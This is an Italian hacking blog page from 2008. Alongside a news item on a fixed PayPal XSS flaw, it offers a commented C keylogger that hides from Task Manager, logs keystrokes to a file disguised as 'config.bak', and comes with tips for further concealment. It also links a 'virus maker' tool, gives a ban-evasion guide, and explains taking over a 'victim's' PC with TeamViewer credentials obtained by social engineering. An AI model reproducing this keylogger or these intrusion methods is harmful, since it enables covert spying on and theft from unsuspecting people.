venerdì 23 maggio 2008

PayPal ha una falla XSS


Un ricercatore di sicurezza finlandese ha scoperto una falla di tipo XSS che permetterebbe a malintenzionati di iniettare codice Javascript nella pagina fallata. Update: il problema è stato risolto.

UpdateL’ufficio stampa di PayPal ha confermato che il problema è stato tempestivamente risolto. “Gli ingegneri PayPal” precisa la nota “non hanno comunque registrato alcun tentativo di “attacco” associato a questa circostanza.”


PayPal, il noto sito per pagamenti online, è affetto da una falla di tipo XSS (Cross Site Scripting) che permetterebbe, in alcune specifiche e limitate circostanze, di carpire i dati personali degli utenti iscritti al sito.

A rilevarla è stato il ricercatore finlandese Harry Sintonen, che ha annunciato la notizia su canali IRC il giorno stesso.

In quanto dichiarato da PayPal c'è del vero: "Ci si può fidare se l'URL inizia con https://www.paypal.com", ma non è del tutto corretta questa affermazione, poichè una protezione di tipo SSL (Secure Sockets Layer) non garantisce la sicurezza del contenuto della pagina.
L'utente viene quindi ingannato dalla barra dell'indirizzo che assume un colore verde a causa del protocollo sicuro https://: il visitatore crederà quindi che tutto sia regolare, anche se in realtà nella pagina è stato inserito codice nocivo.

PayPal sta già lavorando per correggere il bug, ma garantisce comunque che ancora non è stato sfruttato. In ogni caso qualora gli utenti dovessero riscontrare transazioni o acquisti non autorizzati, PayPal conferma che verranno risarciti fino all'ultimo centesimo.
Pubblicato da alle Nessun commento:

Cos'è Un KeyLogger?

IL PROGRAMMA



Ecco ora il sorgente del programma keylogger (se volete una descrizione più dettagliata scaricate il sorgente che ho linkato all'inzio):
CODICE
#define STRICT
#define WIN32_LEAN_AND_MEAN
#define LOGFILE "config.bak"
#include
#include

Queste righe iniziali servono per includere tutte le librerie necessarie al programma, e per definire delle costanti che verranno utilizzate dal compilatore, queste costanti sono utilizzate in quanto il programma che andiamo a creare dovrà essere una applicazione windows e non una semplice finestra di console.
La #define LOGFILE indica in quale file il nostro programma andrà a salvare i tasti che riceve, in questo caso si chiama config.bak, ma potete cambiarlo in ciò che volete.

int WINAPI
WinMain(HINSTANCE hInst, HINSTANCE hPrevInst,
LPSTR lpCmdLine, int nCmdShow)

Vi ricordo che stiamo creando una applicazione windows e non una semplice applicazione di console e quindi non si usa il main, ma il WinMain

CODICE
{
int vKey[]={8,13,16,0};
int i;
FILE *fp;
HMODULE hKERNEL32
FARPROC a_Register;


Queste sono le variabili di cui avremo bisogno nel programma, vKey è un array di interi in cui metteremo i codici virtuali di alcuni tasti.

CODICE
if ( (hKERNEL32 = GetModuleHandle("KERNEL32.DLL")) != NULL)
if( ( a_Register = GetProcAddress(hKERNEL32,"RegisterServiceProcess")) != NULL)
a_Register( GetCurrentProcessId(), 1);


Queste istruzioni verranno eseguite solamente se il nostro keylogger funziona con i sistemi operativi Windows 95, Windows 98, Windows ME, infatti in questi sistemi operativi possiamo, tramite queste semplici righe di codice, nascondere il nostro programma al Task Manager (ossia quando digitiamo Ctrl+Alt+Canc). Provate per credere!!
Nei sistemi operativi Windows 2000 e Windows XP ciò non è possibile e nel Task Manager comparirà questo programma, quindi dovremo trovare un nome molto simile a quello di qualche altro processo per camuffare il nostro programma.

CODICE
while(1){
for (i=VK_SPACE;i<=VK_Z;i++){
if (GetAsyncKeyState(i)){
fp=fopen(LOGFILE,"a");
fprintf (fp,"%c",i);
fclose (fp);
}
}

Questo primo ciclo for controlla se sono stati premuti i tasti che vanno dallo SPAZIO fino alla lettera Z; i vKey di questi tasti sono tutti consecutivi e sono uguali al codice ASCII, quindi si può scrivere sul nostro LOGFILE direttamente il vKey del tasto, che corrisponde al carattere.

CODICE
for (i=0;vKey[i]!=0;i++){
if (GetAsyncKeyState(vKey[i])){
fp=fopen(LOGFILE,"a");
fprintf (fp,"%c",vKey[i]);
Sleep(100);
fclose (fp);
}
}


Ho inserito questo altro ciclo for per controllare altri tasti importanti che sono salvati nell'array vKey:
CODICE
VK_BACK 8 tasto BACKSPACE
VK_RETURN 13 tasto INVIO
VK_SHIFT 16 tasto SHIFT

Sleep(150);


Questa istruzione serve per attendere 150 millisecondi, permettendo così al tasto premuto di essere rilasciato e per "dare respiro" alla CPU.
CODICE
}
return 0;
}


Il programma è ora ultimato.
Vi ricordo che questa è soltanto una semplice implementazione del programma, fatta a scopo didattico, voi potete migliorarlo in molti modi: aggiungendo più tasti da controllare (ad esempio quelli della tastiera numerica), oppure migliorare la gestione del valore di ritorno della GetAsyncKeyState() (vi ricordate che differenziava i tasti appena premuti e quelli premuti in precedenza?), oppure potete anche criptare il LOGFILE (il file dove salvate ciò che gli utenti digitano) per rendere ancora più invisibile la presenza del keylogger; tutto sta alla vostra immaginazione.
Pubblicato da alle Nessun commento:

Virus Maker 3.0

E un pogramma molto Pericoloso,ma molto utile allo stesso tempo
Ecco il Download
Clicca Qui
Pubblicato da alle Nessun commento:

giovedì 22 maggio 2008

Come Aggirare Un BAN

Questa Guida E mia.
Allora vi faccio un esempio! Io devo vedere questo forum ma non posso perchè mi hanno
bannato!!!!!!!!! Come?via ip,o via Nick? Questo lo posso scoprire solo Provando!!
Allora se e via ip,Usate vidalia Scaricabile Da Qua http://www.vidalia-project.net/download.php Modificatevi l'ip
e il gioco e fatto!!!!.
Invece se e solo per nick basta che te ne registri un altro,oppure cambiate browser
come ho fatto io, un esempio in hacking 2.0 mi hanno bannato,
quando mi hanno bannato quale browser stavi usando? beh io Fiferox

e se proviamo a cambiare browser il risultato sarà

non collegatevi quando visualizzate il forum allora dovrete cambiare
un altra volta il Browser :B):
Guida By the_stars
se non mettete il nome,o il forum,violate i copyright ,e quindi io potrei guadagnare
fino a 30.000 euro :lol:
Ciao ;)

Attenzione Questo metodo Non puo anche funzionare certe Volte.
bY The_stars
Pubblicato da alle 2 commenti:

Entrare In Un Pc Con TEAM WIEWER

refazione:
Vi siete mai chiesti come entrare in un pc di una persona?
se si questa è la guida che fa x voi.Il programma sfrutta la connessione remota x entrare nel pc altrui.
Cominciamo:
Intanto installiamo Team wiever qui:
http://www.teamviewer.com/download/TeamViewer_Setup_it.exe
Durante l’installazione, è possibile impostare l’avvio di TeamViewer in maniera automatica quando accendete il pc.
N.B. Sconsiglio questa operazione a chi utilizza TeamViewer in versione freeware; è possibile inserire una password fissa, al posto della password variabile generata ad ogni collegamento, per autorizzare il collegamento da remoto. In questo caso, raccomando di utilizzare una password piuttosto complessa, non facilmente individuabile.

ora per continuare dovete avere un contatto con la vittima e fatevi dare (social)l'id e la psw.

C'è anche la funzione chat,
Questo è il messaggio visualizzato nel caso non riusciate a collegarvi al computer remoto
Seconda parte:
Ora ci siamo connessi,Tenete conto che vi sarà un piccolo ritardo, dipendente dalla velocità della linea, nell’apertura dei programmi, nonché uno sfarfallio momentaneo nell’immagine quando passate da una pagina all’altra.

Queste sono le varie opzioni:

1 Chiudi connessione – Interrompe il collegamento.
2 Aggiorna – Aggiorna manualmente la schermata del video.
3 Opzioni per la connessione – E’ possibile modificare alcune opzioni del programma, nel caso in cui si presentino problemi di velocità, di linea o di grafica.
4 Chat – Apre la schermata della chat tra gli utenti.
5 Trasferimento file – Permette di copiare i file da un pc all’altro.
6 Disattivare input remoto – Blocca la tastiera e il mouse dell’altro utente, impedendogli così di usare il pc.
7 Seleziona finestra singola – Cambia il tipo di visualizzazione.
8 Scambio con l’interlocutore- Cedete il controllo del collegamento e del pc all’altra persona.
9 Attiva/disattiva schermo intero – Apre e chiude la schermata intera.
Presentazione:
La funzione di presentazione è molto simile al controllo remoto. Tuttavia, le differenze non mancano: la funzione di presentazione, infatti, vi offre la possibilità di scambiarvi il controllo, permettendovi così agire sul pc dell’altra persona. Nel controllo remoto, invece, siete voi stessi ad avere il pieno controllo del computer altrui.
Trasferimento file
La funzione di trasferimento è disponibile anche all’interno delle due funzioni di controllo remoto e presentazione. Essa permette di copiare un file da un pc all’altro.
Tenete conto che:
x il trasfermento deve accettare l'altro pc.
che ci sono altre funzionei molto interessanti ke non vi ho spiegato ad esempio che puoi bloccare gli elementi di output del altro pc(mouse ecc.)
che non mi assumo nessuna responsabilita
Le immagini sono state prese nel web e la guida è fatta interamente Da Condor
Pubblicato da alle Nessun commento:

Hacking Revolution Blogs

Ciao a tutti questo blog e stato Creato da the_stars!! Ma il Founder di tutto
è il Condor!
Ora vi diamo il benvenuto,e buona permanenza anche nel Blog Ciao!
Forum: http://hacking-revolution.forumcommunity.net/
Pubblicato da alle Nessun commento:
Iscriviti a: Post (Atom)